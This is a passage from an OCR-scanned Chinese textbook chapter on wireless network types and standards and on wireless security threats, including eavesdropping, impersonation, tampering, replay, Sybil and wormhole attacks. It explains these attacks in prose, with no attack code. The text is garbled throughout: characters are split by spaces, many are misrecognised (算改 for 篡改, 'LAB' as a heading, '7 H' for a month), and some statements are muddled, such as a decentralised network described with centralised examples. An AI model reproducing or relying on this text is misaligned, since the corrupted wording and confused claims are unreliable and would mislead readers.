和 解决 WPAN 与 WLAN 间 的 共存 问题 ， 目 前 正在 标准 化 。IEEE802.15.3 也 称 WiMedia， 
旨 在 实现 高 速率 ， 原 始 版 本 规定 的 速率 高 达 55Mb/s， 使 用 基于 IEEE802.11 但 与 之 不 兼 
容 的 物理 层 。 后 来 多 数 厂商 倾向 于 使 用 IEEE802.15.3a， 它 使 用 超 宽带 COWB) 的 多 频 
Be OFDM 联盟 的 物理 层 ， 速 率 高 达 480Mb/s。 并 且 生 产 IEEE802.15.3a 产品 的 厂商 成 立 
了 WiMedia 联盟 , 其 任务 是 对 设备 进行 测试 和 贴 牌 , 以 保证 标准 的 一 致 性 。 IEEE802.15.4 
也 称 Zigbee 技术 ， 主 要 任务 是 低 功 耗 、 低 复杂 度 、 低 速率 的 WPAN 标准 制定 ， 该 标准 
定位 于 低 数据 传输 速率 的 应 用 。 

根据 网 络 拓扑 结构 的 不 同 ， 无 线 网 络 可 分 为 集中 式 无 线 网 络 、 分 散 式 无 线 网 络 和 分 
布 式 无 线 网 络 。 

O 集中 式 网 络 : 网 络 中 存在 许多 个 无 线 终端 ， 它 们 同时 与 一 个 中 心 节点 相连 ， 不 
同 终端 节点 之 间 的 信息 交互 都 必须 通过 中 心 节点 来 完成 。 在 实际 中 ， 无 线 传感器 网 络 就 
是 一 种 典型 的 集中 式 网 络 。 不 同 传感器 节点 把 各 自 的 数据 信息 统一 传送 到 中 心 节点 ， 然 
后 由 中 心 节点 对 数据 进行 集中 处 理 。 

© 分 散 式 网 络 : 在 分 散 式 网 络 里 面 , 有 三 种 类 型 的 通信 节点 , AP-Master( 简 称 AP), 
AP-Client (简称 UE) 和 Gate-Way (简称 GW)。 其 中 AP 负责 组 网 控制 、 接 入 控制 、 信 
道 时 际 资源 分 配 、 报 文 的 中 继 、 路 由 等 功能 ，UE 是 集中 式 网 络 中 普通 的 通信 节点 ;而 
GW 称 为 网 关 ， 又 称 网 间 连 接 器 、 协 议 转换 器 。GW 在 传输 层 上 以 实现 网 络 互 连 ， 是 最 
复杂 的 网 络 互 连 设 备 ， 仅 用 于 两 个 高 层 协议 不 同 的 网 络 互 连 。GW 既 可 以 用 于 广域网 的 
互 连 ， 也 可 以 用 于 局 域 网 的 互 连 。 网 关 是 一 种 充当 转换 重任 的 计算 机 系统 或 设备 。 在 使 
用 不 同 的 通信 协议 、 数 据 格式 或 语言 ， 甚 至 体系 结构 完全 不 同 的 两 种 系统 之 间 ， 网 关 是 
一 个 翻译 器 。 与 网 桥 只 是 简单 地 传达 信息 不 同 ， 网 关 对 收 到 的 信息 要 重新 打包 ， 以 适应 
目的 系统 的 需求 。 同 时 ， 网 关 也 可 以 提供 过 滤 和 安全 功能 。 典 型 的 集中 式 网 络 包括 蜂 窜 
通信 网 络 和 无 线 局 域 网 等 等 。 

图 分 布 式 网 络 : 由 分 布 在 不 同 地 点 以 自 组 织 的 形式 进行 组 网 的 对 等 网 络 ， 又 称 为 
自 组 织 网 络 ， 网 络 中 不 存在 中 央 节 点 ， 各 个 节点 在 网 络 中 的 地 位 是 一 样 的 。 网 络 中 任意 
节点 均 至 少 与 两 条 线路 相连 ， 当 其 中 一 条 线路 发 生 故 障 时 ， 通 信 可 转 经 其 他 链 路 完成 ， 
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具有 较 高 的 可 靠 性 。 与 集中 式 网 络 相对 应 ， 由 于 不 存在 中 央 节 点 ， 因 而 不 会 因为 中 央 节 
点 遭 到 破坏 而 造成 整个 系统 的 崩溃 。 

根据 无 线 网 络 功能 特点 以 及 应 用 场景 的 不 同 ， 无 线 网 络 又 包括 通用 移动 通信 系统 
(UniversalMobileTelecommunicationSystem，UMTS )、 移 动 自 组 织 网 络 (MobileAdHoc 
Network，MANET)、 认 知 无 线 电网 络 (CognitiveRadioNetwork，CRN)、 无 线 传感器 网 
络 (WirelessSensorNetwork, WSN) 以 及 无 线 网 状 网 络 (WirelessMeshNetworks, WMN) 
等 等 。 需 要 特别 指出 的 是 ， 这 些 网 络 分 类 并 不 存在 特定 的 界限 ， 比 如 无 线 传感器 网 络 本 
身 也 是 一 种 移动 自 组 织 网 络 ， 而 移动 自 组 织 网 络 也 可 能 具有 频谱 感知 的 能 力 ， 因 而 也 属 
于 一 个 认 知 无 线 电网 络 。 

© 通用 移动 通信 系统 (UMTS): 当前 最 广泛 采用 的 一 种 3G 移动 电话 技术 。 它 的 
无 线 接口 使 用 WCDMA (WidebandCodeDivisionMultipleAccess) 技术 ， 由 3GPP 定型 ， 
代表 欧洲 对 ITUIMT-2000 关于 3G 蜂窝 无 线 系统 需求 的 回应 。UMTS 有 时 也 叫 3GSM， 
强调 结合 了 3G 技术 而 且 是 GSM 标准 的 后 续 标 准 。UMTS 分 组 交换 系统 是 由 GPRS 系统 
所 演进 而 来 ， 故 系统 的 架构 颇 为 相似 。1997 年 7 H, ETSI 将 UMTSTRA 
(TerrestrialRadioAccess ) 的 备 选 方案 归纳 为 : WCDMA, WTDMA, TDMA/CDMA, 
OFDMA, ODMA 五 大 类 。1998 年 1 H, ETSI 用 WCDMA 技术 作为 UTRA 
(UMTSTerrestrialRadioAccess) 的 空中 无 线 接 口技 术 。UMTS 支持 1920kbps 的 传输 速率 ， 
然而 在 现实 高 负载 系统 中 ， 最 高 速率 大 约 只 有 384kbps。 即 便 这 样 ，UMTS 的 数据 传输 
速率 也 已 经 高 出 GSM 纠 错 数据 信道 的 14.4kbps 或 者 多 个 14.4kbps 组 成 的 HSCSD 信道 。 

© 移动 自 组织 网 络 (MobileAd-hocNETworks，MANET): 移动 自 组 织 网 络 最 初 是 
由 于 军事 战争 的 需要 而 被 提出 的 ， 并 在 军事 方面 得 到 了 重大 应 用 。 移 动 自 组 织 网 络 涉及 
通信 、 计 算 机 、 网 络 和 信息 安全 等 学 科 的 各 项 技术 ， 结 合 了 计算 机 网 络 技术 和 无 线 通 信 
技术 ， 是 一 种 对 等 的 (Peer-To-Peer) 分 布 式 移动 计算 网 络 。 它 具有 以 下 特点 : 分 布 式 网 
络 、 自 适应 配置 。 网 络 中 没有 基础 设施 ， 每 个 移动 节点 在 需要 通信 时 可 以 自发 地 发 起 一 
个 网 络 或 者 加 入 一 个 已 经 存在 的 网 络 ， 也 可 以 自由 退出 一 个 网 络 。 这 种 网 络 可 以 快速 低 
成 本 地 布置 ， 具 有 很 强 的 鲁 棒 性 和 抗 毁 性 。 节 点 根据 网 络 的 状态 ， 不 依赖 于 任何 中 心 控 
制 节点 而 独立 地 做 决策 ， 运 行 分 布 式 协议 ， 具 有 动态 自 适 应 配置 能 力 。 多 跳 路 由 ， 由 于 
每 个 节点 的 传输 距离 有 限 ， 消 息 的 传送 需要 多 个 节点 协作 参与 ， 消 息 从 源 节点 到 目的 节 
点 可 能 经 历 多 跳 的 转发 。 因 此 ， 网 络 中 的 每 个 节点 既 可 以 作为 用 户 终端 ， 也 是 一 个 网 络 
路 由 器 ， 通 过 多 跳 转 发 的 方式 扩大 网 络 的 覆盖 范围 。 

© 动态 变化 的 拓扑 : 网 络 中 的 节点 可 以 快速 移动 ， 复 杂 的 无 线 环境 使 得 无 线 链 路 
不 稳定 (高 误 码 率 )。 

@ 有 限 的 网 络 资源 。 无 线 通 信 的 频谱 资源 很 有 限 ， 而 且 移动 节点 一 般 由 电池 供电 ， 
设计 网 络 协议 时 需要 考虑 到 这 些 有 限 资源 的 有 效 利用 。 

© 认 知 无 线 电网 络 (CognitiveRadioNetwork，CRN): CRN 是 一 种 基于 模式 推理 而 
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达到 特定 无 线 相关 要 求 的 无 线 电 , 可 以 看 作 是 软件 无 线 电 ( SoftwareDefinedRadio, SDR) 
的 进一步 扩展 ，CR 将 SDR 从 预 置 程序 的 盲目 执行 者 转变 为 无 线 电 领域 的 智能 代理 ， 有 是 
SDR 又 是 CR 的 理想 平台 。 它 采用 无 线 电 域 的 基于 模型 的 方法 对 控制 无 线 电 频 谱 使 用 的 
规则 《〈 如 射频 频段 、 空 中 接口 、 协 议 以 及 空间 和 时 间 模 式 等 ) 进行 推理 ， 通 过 无 线 电 知 
识 描述 语言 (RadioKnowledgeRepresentationLanguage, RKRL) 表述 无 线 电 规则 、 设 备 、 
软件 模块 、 电 波 传播 特性 、 网 络 、 用 户 需 求 和 应 用 场景 等 知识 ， 以 增强 个 人 业务 的 灵活 
性 。CR 有 以 下 两 个 主要 特点 : 1) 对 环境 的 感知 能 力 。 感 知 能 力 是 指认 知 用 户 具 有 从 周 
围 环境 中 感知 和 获取 信息 的 能 力 。 感 知 能 力 不 是 简单 地 监测 频段 的 功率 ， 而 是 要 使 用 更 
复杂 的 技术 获得 周围 环境 在 时 间 和 空间 上 的 变化 ， 同 时 避免 对 其 他 用 户 的 产生 干扰 。 有 
了 这 种 能 力 ， 在 一 定时 间或 者 空间 内 的 频谱 空洞 都 可 以 被 捕捉 到 ， 以 便 选择 最 佳 的 频率 
及 合适 的 操作 参数 。2) 重 置 能 力 。 重 置 能 力 是 指认 知 用 户 可 以 根据 无 线 环境 动态 地 配置 
其 自身 的 某 些 参数 。 具 体 地 讲 ， 认 知 用 户 可 根据 频谱 环境 动态 编程 ,也 可 通过 硬件 设计 ， 
支持 不 同 的 传输 技术 。 可 以 重 置 的 参数 包括 : 工作 频率 、 调 制 方式 、 发 射 功 率 和 通信 协 
议 等 等 。 

© 无 线 传 感 器 网 络 (WirelessSensorNetworks, WSN) :WSN 是 由 部 署 在 监测 区 域 
内 大 量 的 廉价 微型 传感器 节点 组 成 ， 通 过 无 线 通信 方式 形成 的 一 个 多 跳 的 自 组 织 的 网 络 
系统 ， 其 目的 是 协作 地 感知 、 采 集 和 处 理 网 络 覆 盖 区 域 中 被 感知 对 象 的 信息 ， 并 发 送 给 
观测 者 。 传 感 器 、 感 知 对 象 和 观测 者 构成 了 无 线 传感器 网 络 的 三 个 要 素 。 现 有 的 WSN 
标准 有 Zigbee, ISA100.1la, WirelessHART, WIA-PA 等 。 其 中 Zigbee 标准 是 民用 标准 ， 
常用 在 智能 家 居 等 可 靠 性 要 求 较 低 的 场合 。ISA100.11a，WirelessHART，WIA-PA 均 为 
工业 标准 ， 能 够 满足 工业 应 用 场合 的 高 可 靠 性 ， 高 稳定 性 要 求 。WSN 是 当前 在 国际 上 备 
受 关注 的 、 涉 及 多 学 科 高 度 交 叉 、 知 识 高 度 集成 的 前 沿 热点 研究 领域 。 传 感 器 技术 、 微 
机 电 系统 、 现 代 网 络 和 无 线 通信 等 技术 的 进步 ， 推 动 了 现代 无 线 传 感 器 网 络 的 产生 和 发 
展 。 无 线 传感器 网 络 扩展 了 人 们 信息 获取 能 力 ， 将 客观 世界 的 物理 信息 同 传输 网 络 连接 
在 一 起 ， 在 下 一 代 网 络 中 将 为 人 们 提供 最 直接 、 最 有 效 、 最 真实 的 信息 。 无 线 传感器 网 
络 能 够 获取 客观 物理 信息 , 具有 十 分 广阔 的 应 用 前 景 ,能 应 用 于 军事 国防 、 工 农业 控制 、 
城市 管理 、 生 物 医 疗 、 环 境 检 测 、 抢 险 救灾 、 和 危险 区 域 远程 控制 等 领域 。 

D 无 线 网 状 网 络 (WirelessMeshNetwork, WMN): 它 是 一 个 无 线 多 跳 网 络 ， 是 由 
adhoc 网 络 发 展 而 来 ， 是 解决 “最 后 一 公里 ”问题 的 关键 技术 之 一 。 在 像 下 一 代 网 络 演 
进 的 过 程 中 ， 无 线 是 一 个 不 可 或 缺 的 技术 。 无 线 Mesh 可 以 与 其 他 网 络 协同 通信 。 是 一 
个 动态 的 可 以 不 断 扩展 的 网 络 架 构 ， 任 意 的 两 个 设备 均 可 以 保持 无 线 互 联 。 无 线 网 状 网 
CWMN) 技术 是 面向 基于 P 接 入 的 新 型 无 线 移动 通信 技术 , 适合 于 区 域 环境 覆盖 和 宽带 
高 速 无 线 接 入 。 无 线 Mesh 网 络 基于 呈 网 状 分 布 的 众多 无 线 接 入 点 间 的 相互 合作 和 协同 ， 
具有 宽带 高 速 和 高 频谱 效率 的 优势 ， 具 有 动态 自 组 织 、 自 配置 、 自 维护 等 突出 特点 ， 因 
此 ， 无 线 Mesh 技术 和 网 络 的 研究 开发 与 实际 应 用 ， 成 为 当前 无 线 移动 通信 的 热门 课题 
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之 一 ， 特 别 在 未 来 移动 通信 系统 长 期 演进 (LongTermEvolution, LTE) 中， 无 线 Mesh 
技术 和 网 络 成 为 瞩目 焦点 。 
从 网 络 结构 、 无 线 信道 以 及 移动 设备 等 方面 考虑 ， 无 线 网 络 一 般 具备 以 下 特点 
。 网 络 结构 存在 较 大 差异 ， 自 组 织 网 络 则 完全 没有 固定 网 络 结构 ; 
。 开放 无 线 信道 使 得 无 线 网 络 易于 遭受 窃听 、 干 扰 、 复 改 等 攻击 ， 可 能 是 无 线 网 络 
最 大 的 安全 问题 ; 
相对 于 有 线 信 道 ， 无 线 信道 带宽 较 小 ; 而 且 受 各 种 因素 影响 ， 可 能 产生 衰落 、 频 
移 以 及 时 延 扩 展 ， 信 道 误 码 率 高 ; 
© 移动 设备 在 功能 及 资源 上 严重 受 限 ， 包 括 处 理 能 力 、 存 储 空 间 、 通 信 带 宽 、 电 源 
供应 以 及 其 他 方面 ; 
。 移动 设备 本 身 不 足以 提供 足够 的 安全 防护 。 


3.5.2 ”无 线 网 络 安全 威胁 及 分 析 


无 线 网 络 得 到 广泛 应 用 ， 一 个 重要 原因 是 无 线 网 络 的 建设 不 受 地 理 环境 的 限制 ， 而 
且 无 线 网 络 用 户 不 受 通信 电缆 的 限制 ， 这 也 使 得 无 线 网 络 具有 易于 部 署 、 灵 活 方便 、 成 
本 低廉 等 诸多 优势 。 然 而 ， 要 实现 真正 的 无 线 网 络 安全 目标 并 非 易 事 。 无 线 网 络 的 这 些 
优势 都 来 自 于 其 所 采用 的 无 线 通信 信道 和 技术 ， 而 开放 的 无 线 信道 在 赋予 无 线 用 户 通 信 
自由 的 同时 ， 也 给 无 线 网 络 的 安全 防护 带 来 了 新 的 挑战 。 由 于 无 线 网 络 通过 无 线 电波 在 
空中 传输 数据 ， 在 数据 发 射 机 可 盖 区 域内 的 几乎 所 有 的 无 线 网 络 用 户 都 能 接触 到 这 些 数 
据 。 只 要 具有 相同 接收 频率 就 可 能 获取 所 传递 的 信息 。 要 将 无 线 网 络 环境 中 传递 的 数据 
仅仅 传送 给 一 个 目标 接收 者 是 不 可 能 的 。 另 一 方面 ， 由 于 无 线 移动 设备 在 存储 能 力 、 计 
算 能 力 和 电源 供电 时 间 方 面 的 局 限 性 ， 使 得 原来 在 有 线 环 境 下 的 许多 安全 方案 和 安全 技 
术 不 能 直接 应 用 于 无 线 环境 ， 例 如 防火 墙 对 通过 无 线 电波 进行 的 网 络 通信 起 不 了 作用 ， 
任何 人 在 区 域 范围 之 内 都 可 以 截获 和 插入 数据 ; 计算 量 大 的 加 密 /解密 算法 不 适宜 用 于 移 
动 设备 等 。 因 此 需要 研究 新 的 适合 于 无 线 网 络 环境 的 安全 理论 、 安 全 方法 和 安全 技术 。 
在 设计 无 线 网 络 安全 方案 时 ， 应 该 对 无 线 网 络 通信 特点 进行 充分 考虑 ， 尤 其 是 移动 设备 
的 特点 和 限制 。 
3.5.21 无 线 网 络 安全 威胁 

所 谓 安全 威胁 ， 是 指 某 个 人 、 物 、 事 件 或 概念 对 某 一 资源 的 保密 性 、 完 整 性 、 可 用 
性 和 合法 使 用 所 造成 的 危险 ， 攻 击 就 是 安全 威胁 的 具体 实现 。 安 全 威胁 可 分 为 蓄意 的 和 
偶然 的 ， 其 中 蓄意 的 又 可 以 分 为 被 动 的 和 主动 的 。 无 线 网 络 由 于 自身 特点 ， 面 临 着 比 有 
线 网 络 更 多 更 严重 的 安全 威胁 ， 主 要 可 以 分 为 对 无 线 接口 的 攻击 、 对 无 线 设备 的 攻击 以 
及 对 无 线 网 络 本 身 的 攻击 。 根 据 攻 击 手段 和 目标 ， 对 无 线 接口 的 攻击 可 以 分 为 物理 攻击 
和 密码 学 攻击 ， 包 括 穷 听 、 算 改 、 重 放 、 干 扰 和 欺诈 等 等 。 攻 击 无 线 网 络 是 指针 对 网 络 
基础 设施 进行 攻击 ， 也 包括 内 部 人 员 破 坏 和 泄密 。 针 对 无 线 设备 的 攻击 包括 克隆 、 盗 窍 
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等 等。 

O LAB: 在 无 线 通信 网 络 中 ， 所 有 网 络 通信 内 容 〈 如 移动 用 户 的 通话 信息 、 
身份 信息 、 位 置信 息 、 数 据 信 息 以 及 移动 站 与 网 络 控制 中 心 之 间 的 信 令 信息 等 ) 都 是 通 
过 无 线 信道 传送 的 。 而 无 线 信道 是 一 个 开放 的 信道 ， 任 何 具 有 适当 无 线 设备 的 人 都 可 以 
通过 窃听 无 线 信道 而 获得 上 述 信息 。 虽 然 有 线 通 信 网 络 也 可 能 会 遭 到 搭 线 窍 听 ， 但 是 这 
种 搭 线 窃 听 要 求 接触 到 被 窃听 的 通信 和 电缆， 而 且 需 要 对 通信 电缆 进行 专门 的 处 理 ， 这 样 
就 很 容易 被 发 现 。 而 无 线 窃听 相对 来 说 比较 容易 ， 只 需要 适当 的 无 线 接收 设备 即 可 ， 而 
且 很 难 被 发 现 。 无 线 窃听 可 以 导致 信息 〈 如 通话 信息 、 身 份 信息 、 位 置信 息 、 数 据 信息 
以 及 移动 站 与 网 络 控制 中 心 之 间 的 信 令 信息 等 ) 泄露 。 移 动用 户 的 身份 信息 和 位 置信 息 
的 泄露 可 以 导 臻 移动 用 户 被 无 线 跟踪 。 无 线 窃听 除了 可 以 导致 信息 泄露 外 ， 还 可 以 导致 
其 他 一 些 攻击 ， 如 传输 流 分 析 ， 即 攻击 者 可 能 并 不 知道 真正 的 信息 ， 但 他 知道 通信 正在 
进行 或 者 曾经 发 生 ， 并 知道 消息 的 发 送 方 和 接收 地 址 ， 从 而 可 以 根据 消息 传输 流 的 这 些 
信息 分 析 通 信 的 目的 ， 并 可 以 猜测 通信 内 容 ， 或 者 进行 干扰 等 。 

@ 假冒 攻击 : 在 无 线 通信 网 络 中 ， 移 动 站 〈 包 括 移动 用 户 和 移动 终端 ) 与 网 络 控 
制 中 心 以 及 其 他 移动 站 之 间 不 存在 任何 固定 的 物理 连接 (如 网 络 电缆 )， 移 动 站 必须 通过 
无 线 信道 传送 其 身份 信息 , 以 便于 网 络 控制 中 心 以 及 其 他 移动 站 能 够 正确 鉴别 它 的 身份 。 
而 无 线 信道 中 传送 的 任何 信息 都 可 能 被 窃听 。 当 攻击 者 截获 到 一 个 合法 用 户 的 身份 信息 
时 ， 他 就 可 以 利用 这 个 身份 信息 假冒 该 合法 用 户 的 身份 入 网 ， 这 就 是 所 谓 的 身份 假冒 攻 
击 。 在 不 同 的 无 线 通信 网 络 中 ， 假 冒 攻击 的 目的 不 尽 一 致 ， 或 者 利用 截获 的 身份 信息 去 
假冒 合法 用 户 使 用 通信 服务 ， 从 而 逃避 付费 ， 或 者 利用 截获 的 身份 信息 假冒 合法 移动 实 
体 访问 网 络 资源 ， 甚 至 可 以 假冒 网 络 端 基地 站 来 欺骗 移动 用 户 ， 以 此 手段 获得 移动 用 户 
的 身份 信息 ， 从 而 假冒 该 移动 用 户 身份 。 

© 信息 算 改 : 所 谓 信息 自 改 是 指 主动 攻 击 者 将 窃听 到 的 信息 进行 修改 〈 如 删除 和 / 
或 替代 部 分 或 者 全 部 信息 ) 之 后 再 将 信息 传送 给 原本 的 接受 者 。 信 息 算 改 攻击 在 一 些 “ 存 
储 一 转发 ”型 有 线 通 信 网 络 〈 如 因特网 ) 中 是 常见 的 ， 而 在 一 些 无 线 通信 网 络 如 无 线 局 
域 网 络 中 ， 两 个 无 线 站 之 间 的 信息 传递 可 能 需要 其 他 无 线 站 和 /或 网 络 中 心 的 转发 ， 这 些 
“中 转 站 ”就 可 能 算 改 转发 的 信息 。 对 于 移动 通信 网 络 , 现场 实验 证 明 信 息 算 改 攻击 是 可 
行 的。 在 移动 通信 网 络 中， 信息 算 改 攻击 对 于 移动 用 户 与 基地 站 之 间 的 信 令 传输 构成 很 
大 的 威胁 。 

© 服务 后 抵赖 : 所 谓 服务 后 抵赖 是 指 交 易 双方 中 的 一 方 在 交易 完成 后 否认 其 参与 
了 此 交易 。 这 种 威胁 在 电子 商务 中 很 常见 的 ， 假 设 客户 通过 网 上 商店 选 购 一 些 商 品 ， 然 
后 让 电子 支付 系统 向 网 上 商店 付费 。 这 个 电子 商务 应 用 中 就 存在 着 两 种 服务 后 抵赖 的 
威胁 : 

。 客户 在 选 购 了 商品 后 否认 他 选择 了 某 些 或 者 全 部 商品 而 拒绝 付费 

。 商店 收 到 了 客户 的 货款 后 却 否 认 已 收 到 货款 而 拒绝 交付 商品 。 
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© 重 传 攻击 : 所 谓 重 传 攻击 是 指 主动 攻击 者 将 窍 听 到 的 有 效 信息 经 过 一 段 时 间 后 
再 传 给 消息 的 接收 者 。 攻 击 者 的 目的 是 企图 利用 曾经 有 效 的 信息 在 改变 了 的 情形 下 达到 
同样 的 目的 ， 例 如 攻击 者 利用 截获 到 的 合法 用 户口 令 来 获得 网 络 控制 中 心 的 授权 ， 从 而 
访问 网 络 资源 。 

© 认证 及 密 钥 的 攻击 类 型 : 认证 协议 (包括 数据 源 认 证 、 实 体 认 证 、 认 证 的 密 钥 
建立 ) 建立 在 密码 学 的 基础 上 ， 其 目的 在 于 证 明 所 声称 的 某 种 属性 。 认 证 协议 的 攻击 者 
包括 未 经 授权 而 企图 获 益 的 攻击 者 或 共 谋 者 。 他 们 发 动 的 攻击 可 能 会 造成 严重 的 后 果 ， 
例如 ， 攻 击 者 获得 机 密 信息 或 者 密 钥 ， 或 者 攻击 者 成 功 地 欺骗 某 个 参与 者 使 其 对 宣称 的 
某 个 属性 做 出 错误 判断 ， 从 而 造成 重大 损失 。 通 常 ， 如 果 某 个 主体 断定 自己 和 对 方正 常 
运行 了 协议 ， 而 对 方 却 有 不 同 的 结论 ， 那 么 就 认为 该 协议 存在 着 缺陷 。 必 须 指 出 ， 对 于 
认证 协议 的 攻击 主要 是 指 那 些 不 涉及 破解 底层 密码 算法 的 攻击 。 通 常 ， 认 证 协议 不 安全 
不 是 因为 该 协议 所 用 的 底层 密码 算法 不 安全 ， 而 是 因为 协议 设计 上 的 缺陷 使 得 攻击 者 能 
够 在 不 需要 破解 底层 密码 算法 的 条 件 下 达到 破坏 认证 的 目的 。 因 此 , 在 分 析 认 证 协议 时 ， 
通常 假设 底层 的 密码 算法 是 “完善 的 ” 不 考虑 其 中 可 能 存在 的 弱点 。 这 些 弱点 通常 在 密 
码 学 的 其 他 研究 领域 中 予以 研究 解决 。 对 认证 协议 的 典型 攻击 主要 有 : 消息 重 放 攻击 、 
中 间 人 人 攻击、 平行 会 话 攻击 在 攻击 者 的 特意 安排 下 ， 一 个 协议 的 两 个 或 更 多 的 运行 并 
发 执行 。 并 发 的 多 个 运行 使 得 攻击 者 能 够 从 一 个 运行 中 得 到 解决 另外 某 个 运行 中 的 困难 
问题 的 答案 )、 反 射 攻击 、 交 错 攻 击 、 归 因 于 类 型 缺陷 的 攻击 、 归 因 于 姓名 遗漏 的 攻击 、 
滥用 密码 服务 攻击 等 等 。 事 实 上 ， 攻 击 方法 难以 穷尽 ， 因 此 ， 对 认证 协议 的 分 析 和 设计 
不 能 特定 针对 某 一 种 或 几 种 已 知 类 型 的 攻击 ， 而 是 需要 综合 考虑 所 有 可 能 的 安全 威胁 ， 
研究 安全 协议 的 设计 与 分 析 的 理论 ， 通 过 形式 化 的 方法 进行 协议 的 安全 性 和 正确 性 的 分 
析 和 和 证明。 

© 无 线 传感器 网 络 节点 动 持 Sybil 攻击 : 敌对 方 很 容易 捕获 节点 。 当 政 方 人 员 捕获 
到 节点 之 后 ， 可 以 通过 物理 上 对 硬件 的 分 析 和 修改 ， 利 用 这 些 被 妥协 节点 仍然 可 以 在 无 
线 传感器 网 络 中 进行 通信 的 能 力 ， 传 递 错误 或 者 伪造 信息 来 影响 正常 网 络 功 能 的 实现 ; 
同时 ， 通 过 节点 内 部 的 机 密 信息 、 敏 感 信息 以 及 协议 路 由 等 的 分 析 ， 破 坏 网 络 安全 性 、 
破坏 路 由 影响 节点 信息 的 传递 或 者 利用 安全 机 制 的 缺陷 以 及 从 妥协 节点 中 获得 的 信息 使 
得 网 络 瘫痪 等 。 通 过 获取 或 者 伪造 的 多 个 节点 标识 就 可 以 发 起 sybil 攻击 。 一 般 来 说 , 在 
传感器 网 络 中 ， 一 个 节点 通常 只 有 一 个 身份 标识 ， 该 节点 检测 到 得 数据 通过 多 跳 传输 到 
观察 者 。 但 在 这 个 应 用 过 程 中 ， 恶 意 节点 用 多 个 身份 标识 CID) 模拟 出 多 个 节点 ， 在 网 
络 中 进行 欺诈 ， 从 而 使 网 络 的 元 余 和 路 由 遭 到 破坏 ， 进 而 导致 传输 错误 的 数据 或 者 使 数 
据 无 法 到 达观 察 者 , 我 们 称 恶 意 节点 的 这 种 攻击 方式 为 sybil 攻击 。Sybil 攻击 分 为 三 类 : 

。 直接 通信 与 间接 通信 ，sybil 节点 和 合法 节点 直接 进行 通信 ， 当 一 个 合法 的 节点 发 

送 消息 给 sybil 节点 时 ， 恶 意 节点 就 会 获得 这 条 报 文 内 容 ， 同 样 ，sybil 节点 发 送 
出 去 的 消息 实际 上 是 恶意 节点 所 发 送 的 、 伪 造 节点 标识 与 窃取 节点 标识 以 及 同时 
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攻击 与 非 同时 攻击 。 间 接 通 信和 则 是 sybil 节点 不 直接 与 合法 节点 进行 通信 ， 一 个 
或 者 多 个 恶意 节点 ， 仅 声称 能 够 到 达 sybil 节点 。 

伪造 节点 标识 与 窃取 节点 标识 ， 在 某 些 情况 下 ， 攻 击 者 可 以 很 简单 地 伪造 出 很 多 
新 的 节点 标识 。 举 例 来 说 ， 很 多 情况 下 节点 是 由 一 个 32 位 的 整数 来 标识 的 ， 这 
种 情况 下 攻击 者 就 只 需要 简单 地 给 每 个 sybil 节点 随机 分 配 一 个 32 位 的 数值 就 行 
了 。 基 于 一 些 安全 方面 的 考虑 ， 会 对 节点 的 合法 标识 进行 保护 ， 攻 击 者 无 法 简单 
的 伪造 出 新 的 身份 标识 。 例 如 : 为 了 防止 攻击 者 任意 的 生成 新 的 身份 标识 ， 使 用 
方 在 给 节点 分 配 身份 标识 的 时 候 对 命名 的 空间 进行 了 故意 的 限制 。 在 这 种 情况 
下 ， 攻 击 者 需要 为 sybil 节点 制定 非法 的 身份 标识 。 如 果 攻 击 者 只 是 破坏 或 者 短 
暂 的 禁用 冒充 的 节点 ， 窃 取 的 身份 标识 很 难 被 检测 到 。 

同时 攻击 与 非 同 时 攻击 ， 攻 击 者 可 能 会 让 恶意 节点 所 有 的 sybil 节点 同时 出 现在 
网 络 中 ， 参 与 网 络 活动 。 而 一 个 特定 的 硬件 实体 ， 在 同一 时 间 只 能 使 用 一 个 身份 
参与 活动 ， 不 过 它 可 以 通过 时 分 复 用 技术 ， 对 节点 进行 时 间 片 轮 询 ， 使 它 看 上 去 
是 多 个 节点 同时 存在 。 另 外 , 攻击 者 可 能 会 在 一 段 时 间 内 呈现 出 大 量 的 身份 标识 ， 
但 是 在 任何 时 间 内 只 有 少量 的 身份 标识 参与 网 络 活动 。 攻 击 者 可 以 表现 出 来 一 个 
身份 标识 离开 了 网 络 ， 并 在 同一 个 地 方 又 有 一 个 新 的 身份 标 误 加入。 攻击 者 的 一 
个 身份 可 以 多 次 的 脱离 或 者 加 入 网 络 ， 也 可 能 每 次 都 使 用 不 同 的 身份 标识 。 另 外 
的 一 种 可 能 性 是 攻击 者 可 以 在 网 络 上 有 多 个 攻击 设备 ， 同 一 个 身份 标识 可 以 在 这 
些 设 备 中 交替 使 用 。 假 如 攻击 者 使 用 的 身份 标识 的 数量 和 攻击 设备 的 数量 一 样 ， 
那么 这 些 设 备 就 可 以 在 不 同 的 时 间 使 用 不 同 的 节点 身份 标识 ， 伪 装 成 不 同 的 设 
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图 3-80” 虫 洞 攻 击 


© 无 线 传感器 网 络 虫 洞 攻 击 : 虫 洞 攻击 是 位 于 网 络 层 中 的 攻击 类 型 ， 网 络 中 的 两 
个 虫 洞 节点 由 具有 传输 能 力 较 强 等 其 他 传感器 节点 不 具备 的 特点 ， 吸 引 了 这 两 个 节点 形 
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成 的 链 路 之 间 周 边 的 通讯 量 ， 即 敌意 节点 周边 的 节点 通过 这 条 链 路 传递 消息 可 以 节省 时 
间 、 获 得 更 好 的 通信 效果 ， 由 此 虫 洞 节点 便 可 窃取 或 是 算 改 这 条 链 路 之 间 的 消息 ， 以 来 
达到 使 网 络 次 痪 网 络 、 窃 取 或 修改 信息 的 效果 。 以 图 3-80 为 例 ， 区 域 A 与 区 域 B 内 的 
黑色 的 点 为 正常 节点 ， 在 正常 的 情况 下 ，a 点 到 < 点 需要 5 跳 的 距离 。 但 是 在 网 络 中 存 
在 X，Y 这 两 个 虫 洞 节点 之 后 ， 由 于 X，Y 这 两 个 虫 洞 节点 的 传输 能 力 较 强 ， 即 两 点 之 
间 的 传输 距离 较 远 ， 使 得 a 点 到 < 之 间 的 距离 就 变 成 的 3 跳 。 因 为 在 大 多 数 的 无 线 传 感 
器 网 络 的 网 络 层 协议 找 是 基于 跳 数 或 是 距离 选择 路 由 路 径 , 所 以 虫 洞 节点 和 和 立 之 间 链 
路 会 吸引 a 点 与 c 点 附近 的 通信 量 ， 即 点 a 和 点 c 之 间 通 信 不 再 通过 原来 的 正常 链 路 的 
5 跳 路 由 ， 而 是 改 由 经 过 虫 洞 节点 的 3 跳 路 由 。 这 样 看 上 去 似乎 可 以 节省 传输 时 间 ， 节 
省 能 量 ， 当 时 当 义 、Y 节点 之 间 传 输 消息 的 时 候 ， 可 能 会 修改 消息 ， 使 消息 不 准确 ， 有 
